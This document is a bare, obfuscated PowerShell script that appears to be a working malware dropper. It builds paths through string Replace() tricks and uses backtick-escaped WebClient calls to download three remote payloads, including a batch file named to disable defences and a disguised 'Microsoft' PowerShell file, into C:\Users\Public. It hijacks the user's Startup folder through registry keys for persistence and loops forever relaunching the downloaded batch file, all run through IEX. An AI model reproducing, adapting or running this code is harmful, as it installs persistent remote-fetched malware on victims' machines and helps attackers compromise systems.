
$A0="C:xxx.com\Run".Replace("xxx.com","\Users\Public")
$A1 = "CrEP".Replace("EP","eateDirectory")
$BB = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
$CC= "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$DD = "C:leejonkun".Replace("leejonk","\Users\Public\R")
$EE ="C:kimjongun".Replace("kimjong","\Users\Public\R")
$cv = 'C:\Uscat'.Replace("c","ers\Public\Run\Run.b")
$cd = 'C:\js1'.Replace("j","Users\Public\ Microsoft.p")
$jj = "C:\jav.com.ps1".Replace("jav.com","Users\Public\ Microsoft")
$link = 'https://ia601506.us.archive.org/8/items/server_20210423_0832/Server.txt'
[system.io.directory]::$A1($A0)
start-sleep -s 5
Set-ItemProperty -Path $BB -Name "Startup" -Value $DD;
Set-ItemProperty -Path $CC -Name "Startup" -Value $EE;
start-sleep -s 5
Function vip
{



start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ia601409.us.archive.org/14/items/disable-bat/DISABLE_BAT.txt','C:\Users\Public\dis.BAT')){
}


if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ia601500.us.archive.org/5/items/bat_20210429/bat.txt',$cv)){
}
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"($link, $cd)){
}
Start-Sleep 7
while ($true)
{
if((get-process "MSBuild" -ea SilentlyContinue) -eq $Null){

start -file "C:\Users\Public\dis.BAT"
}
Start-Sleep 9

}
}
IEX vip
